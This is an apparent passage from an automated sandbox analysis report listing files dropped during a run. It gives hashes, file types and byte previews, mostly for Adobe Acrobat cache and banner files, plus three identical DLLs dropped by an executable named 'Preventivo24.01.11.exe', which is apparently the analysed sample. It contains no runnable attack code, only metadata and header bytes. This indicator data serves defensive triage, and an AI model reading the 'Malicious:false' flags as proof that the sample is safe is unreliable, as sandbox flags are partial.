                      SSDEEP:24:Yv6XjrEzvO2LgEsk4ccVrhmTBcu14wChds8ctq3H6w:YvjGognkMVrYTB5OJhds8c2H3
                      MD5:1D66578DDBF4CB4486114223831DD601
                      SHA1:40BFD718948AD425DCCAC0E4C1685140EDCF0387
                      SHA-256:5B5B2BCFE44DF186B670B7F0518C3D48D38AE63CE091B78431B70D8E5FD070C3
                      SHA-512:5D3CEDE81164DD149DEF0C55A8C8544F66751BEC9DC0FDC553A08F54703B55571F02BA451CC3F36BDF0D2D4EA2A3E624462207E11D2BB54541F99CE7AC89E9D6
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_3","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"07caa165-20a7-4c5f-adf8-061ef3d98af3","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2NvbG9yX2RhcmtfdGhlbWUiO
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1368
                      Entropy (8bit):5.7518951012339485
                      Encrypted:false
                      SSDEEP:24:Yv6XjrEzvCKLgEGcooZbq0jCaBrwJoZct5uWaHbX3H6w:YvjqEgNoNtlSJEc3uWaHbHH3
                      MD5:1202543A9C0708D01BEB1B9FAE071D78
                      SHA1:E0A8D838CBE598262B5EDD2DB4BBB1BC5FB1A3BB
                      SHA-256:C039E62C2A97ED47B074D88309B1030F63E4F8998F5E6422CD36ABA5304D316A
                      SHA-512:A0F85F2531EA3263027F73AFFCAF7AEADA7969BD482E27F601CD5BFBFAEAA3A98A1D9C15036A9BA1258AAB0C84C110E95DA7C54BC1E8954114286B8491A518D6
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"70654_217714ActionBlock_0","campaignId":70654,"containerId":"1","controlGroupId":"","treatmentId":"692283b7-dc9d-4f79-9ee2-bccf324c2980","variationId":"217714"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNyIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTEiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBhbGwgUERGIGFuZCBlLXNpZ25pbmcgdG9vbHMuIiwiYmFja2d
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.286890275515594
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfYdPeUkwRe9:YvXKX9drEZc0v2Gg8Ukee9
                      MD5:E04A348FCA881C4EAF32B8EFC79BCD26
                      SHA1:AAD874B9796EA320F8FDF8DDD56E3216C6A772CD
                      SHA-256:1821E6655CCBFA2FCE7EE122A0A8900C200C3663CB70E44A6BDF536E6747139D
                      SHA-512:DFD84B36C3C5AF7B0931A950564F93BFFD1D6BB99409E43E109D651803B26F7CB173E30258EDC1646DAEE3C40560E30C340151D9C86F0EA503FC07795185DB72
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1395
                      Entropy (8bit):5.774979893660522
                      Encrypted:false
                      SSDEEP:24:Yv6XjrEzvBrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNNw:YvjZHgDv3W2aYQfgB5OUupHrQ9FJQ
                      MD5:63C08DEEE241B08F4F595DA9AD5125CB
                      SHA1:90A5918EB07A4873458C86964F3C394647A8C814
                      SHA-256:A12F7D69BBEC7E8349C5BF9947F883673D15BF39CB49E2C2398AA96489342990
                      SHA-512:6181F6664FFB2E2001FD4AFCD2767ED2BA2DCB80ED0F71DF88416E7FDA64D42556DA147D75340C3137599DE6F90091DD6B41F0ABD007634F4AE9CF8BF08736B9
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):291
                      Entropy (8bit):5.270527474388663
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfbPtdPeUkwRe9:YvXKX9drEZc0v2GDV8Ukee9
                      MD5:66618CF190C3033ABAB2383F1A037CDD
                      SHA1:05D1FD8D42423EB2A056438759A23ABA72265AD1
                      SHA-256:6907ACC3F8C0C04EA5C9DEFFC4224E24B76A7C0E7CA946311FD7D9D8116AA215
                      SHA-512:335DA67EDAF34B6481197344CE9F06D50EB12601B2AD1D209A38FFFBB5C12CFB7AA89CAB9940D064A8FED508F5FDC8BBA54B075F0FF9BEB6E714911A0BAF69D2
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):287
                      Entropy (8bit):5.275572745613981
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJf21rPeUkwRe9:YvXKX9drEZc0v2G+16Ukee9
                      MD5:2C24C28097FC38C7B6C6654E14D1A6BE
                      SHA1:D4609348FCEBC09FA8C0C11D60BF8142E15FF649
                      SHA-256:CAD51D6348EAAA148A54A6C1926F106038540B9927DDCDCD4FC6E2836EA4067C
                      SHA-512:CCF3F72EB84D6556CE31510ED82B6DDFE0B5028B065372F9E19B4BF5FFE67BDA0868A81A055C356028E0919DA9E59049064FEA5E54FD58CA8D1C9008DAF7DF7E
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1250
                      Entropy (8bit):5.715849560792744
                      Encrypted:false
                      SSDEEP:24:Yv6XjrEzvTamXayLgEs54c3drNaHmTBcu14wChqx+plVCV9FJN3H6w:YvjrBgn5drpTB5OJhr9Q9FJ9H3
                      MD5:A720BB898C0D59DA44E99A28B80ABB57
                      SHA1:21228D703535273259D71D6B8A5C3ACCAC2360FF
                      SHA-256:9261494E0295FEFB48025FD89D1BEC6143EF4CCAD9EB9F2CB861F52378D9E6C0
                      SHA-512:3D8D9D632FBD88F9667CA2724EFD981B199D3D15F1D2D73AAA7F9471680EA3AE2CE848F687EDB1F7D13584207BBF659298222C2AEE722564FE365BA5B2744A6D
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_2","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"8deb148d-1a64-4e57-9648-e8bf939c598e","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJTZW5kIGRvY3VtZW50cyAmIGZvcm1zIFxuZm9yIGZhc3QgZS1zaWduaW5nIG9ubGluZS4iLCJiYWNrZ3JvdW5kX3N0eWxpbmciOnsiYmFja2dyb3VuZF9jb
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):286
                      Entropy (8bit):5.250873045342247
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfshHHrPeUkwRe9:YvXKX9drEZc0v2GUUUkee9
                      MD5:A79981F201FD27A47C7D0A830078BCDC
                      SHA1:25C59BBEA21E9242CF78F8C2E08218371F921DBC
                      SHA-256:C64D76CBFEF23BB04B617F47D809A5079C31A95E46287C78ED4EE5EFD52FC1E9
                      SHA-512:A125FD5FC6FB2D71C0CF576EA580E29FEA9006F2628DBE373C51FDC2406954FD0FFD5F659F2D100BA9B026BDE1668776B72C33FDE73537A3D49325FE67972323
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):782
                      Entropy (8bit):5.357579607989155
                      Encrypted:false
                      SSDEEP:12:YvXKX9drEZc0v2GTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWRW1:Yv6XjrEzvQ168CgEXX5kcIfANh6w
                      MD5:AE7067E0369DA0FC7AEB1257B7016A22
                      SHA1:C2F0EDDF4FE4E05FA37B0291210A4EB15CC23C66
                      SHA-256:6A332DCDD7F498618B14E99C03B0E5CB2DAFC40C1EF4063E85E525DBB5656D1E
                      SHA-512:0A90828468A08132379E5312F16F6163A282DA08C6A018A772AA587313068E737AC2B2659A0DADFFD6320489FBBC23A2F766E26E637D08DCE5BB8711335563A3
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1706008698598}}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4
                      Entropy (8bit):0.8112781244591328
                      Encrypted:false
                      SSDEEP:3:e:e
                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                      Malicious:false
                      Preview:....
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):2818
                      Entropy (8bit):5.127436694158643
                      Encrypted:false
                      SSDEEP:24:YsqBwq0uxaDayBYRvMgmxFaCFMIlKd0mA4zVB4Yd4QW7CjMSj0SFQ9y0F2IAv2Lm:YCY1mQ4R145uYXMk09dAviU9Nkx98
                      MD5:DDC5FAD41CF2DA20F2CD11395D0548E8
                      SHA1:7356665EBB098262FAF8DD68B1DF06DDD36CF335
                      SHA-256:6097BA5716B3ABD570DA3C15D8AB6BA86747B3E0EA7FD68642562EF794163527
                      SHA-512:5A079BF24B9F19B6FDFE09E150A7FE07A3CB09C5CF992AB9E575994D5BD1CD732C7BF9ED8016ACEC2456FC75F25FE14149B6B55EA8C12E491850991CEC30FF35
                      Malicious:false
                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2766787c734b0355c5c3dd7dd276438a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706008698000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"148a230e3dff4ce102810dc14152ce3e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1368,"ts":1706008698000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f6404e55972a67397fc4cdfd3c68e41d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706008698000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"5084a35e095cd4116d7c5d11ef7b28e8","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1706008698000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"bc498d852bfb7e7b970a86b49a8cd656","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1706008698000},{"id":"Edit_InApp_Aug2020","info":{"dg":"b2597987459352b5acbee1fad0fa2cff","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                      Category:dropped
                      Size (bytes):12288
                      Entropy (8bit):1.187069151370841
                      Encrypted:false
                      SSDEEP:48:TGufl2GL7msEHUUUUUUUUmSvR9H9vxFGiDIAEkGVvpc:lNVmswUUUUUUUUm+FGSItA
                      MD5:948E40B8FF3C0C6CD247274DEAE70C59
                      SHA1:B05A699952645335FA3C4A8CCFB80007C2F0EE16
                      SHA-256:BE186B503810B03A14942AB5C0F56F0938592A4E56FCD1A7ED8F7B9F11B91866
                      SHA-512:2A49D2187DCB9AE2154B629062FFAFCAC66EE2C8B71B903DD62A8AED6BFB2AB96100662152B83BBF6F1FEE0F17678948EC7FED26F37388ECC2E4A1A74F6D9C61
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite Rollback Journal
                      Category:dropped
                      Size (bytes):8720
                      Entropy (8bit):1.6041849445913965
                      Encrypted:false
                      SSDEEP:48:7MwbKUUUUUUUUUUkvR9H9vxFGiDIAEkGVvcqFl2GL7msz:7gUUUUUUUUUU0FGSIteKVmsz
                      MD5:457D6C179B1F46D95BF0F49AA3BA545C
                      SHA1:EA61239924BDB8B1BF215E44A5A40E6A675EF193
                      SHA-256:B7D7BCF014D34E0E25ADEE0DBCA3950B974B706C22F89E6C70F58BE1AE14F959
                      SHA-512:2FC0407B162A2B87F8B088EAB01221ABCAE4EB452967DC50CF6285CF5A5BAB7B918D6508E3DE648DD91F4035B08737F5D1E334AC08D3EB8E6F3A85D32FB84FE3
                      Malicious:false
                      Preview:.... .c.....87........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):66726
                      Entropy (8bit):5.392739213842091
                      Encrypted:false
                      SSDEEP:768:RNOpblrU6TBH44ADKZEgOhP2YblS81v17heApUsOXEPeYyu:6a6TZ44ADEOhPhblS81vahBK
                      MD5:3E57A19237714CD662B6E6E5EF9EF5F5
                      SHA1:7586ADBBA2695B96E5E5C7A9BC5A16BC519755CF
                      SHA-256:7D1A7602AE02EC09DF354F701089E1C213D1F7A663F16AB51F599DA6937CEDB6
                      SHA-512:C3089367989CB30159D9DEE4D172287379B4767E184D8CEDFFEBB7FD825916E5DCDC7B90E612EC6F3B367CA7A94E9EF7AF266F64D01B6F24FDE8661E7692DC0B
                      Malicious:false
                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):246
                      Entropy (8bit):3.505069684106714
                      Encrypted:false
                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rpa3GlGll:Qw946cPbiOxDlbYnuRK0IGlGn
                      MD5:0A5ED263E52032380525899C0D784885
                      SHA1:387775C19E1524FACC0881E54141FA206671C716
                      SHA-256:61BB219BC3E9426DE667600AADF1EF4322561CC65F0DA5B718B4D3CA61652C2B
                      SHA-512:F3DCDC6F5C7E5CDF47F454EFA40EDF7CFBBDAF83723E46D58B2CA5CF160D44856091017173CC67A47C9C16564656C4D2A49D57868423DF9323603E345549EE9F
                      Malicious:false
                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.0.1./.2.0.2.4. . .1.2.:.1.8.:.1.8. .=.=.=.....
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):756576
                      Entropy (8bit):6.616629532136608
                      Encrypted:false
                      SSDEEP:12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
                      MD5:B158D8D605571EA47A238DF5AB43DFAA
                      SHA1:BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
                      SHA-256:CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
                      SHA-512:56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):756576
                      Entropy (8bit):6.616629532136608
                      Encrypted:false
                      SSDEEP:12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
                      MD5:B158D8D605571EA47A238DF5AB43DFAA
                      SHA1:BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
                      SHA-256:CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
                      SHA-512:56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):756576
                      Entropy (8bit):6.616629532136608
                      Encrypted:false
                      SSDEEP:12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
                      MD5:B158D8D605571EA47A238DF5AB43DFAA
                      SHA1:BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
                      SHA-256:CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
                      SHA-512:56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with very long lines (393)
                      Category:dropped
                      Size (bytes):16525
                      Entropy (8bit):5.345946398610936
                      Encrypted:false
                      SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                      MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                      SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                      SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                      SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                      Malicious:false
                      Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                      Category:dropped
                      Size (bytes):15114
                      Entropy (8bit):5.349964663512601
                      Encrypted:false
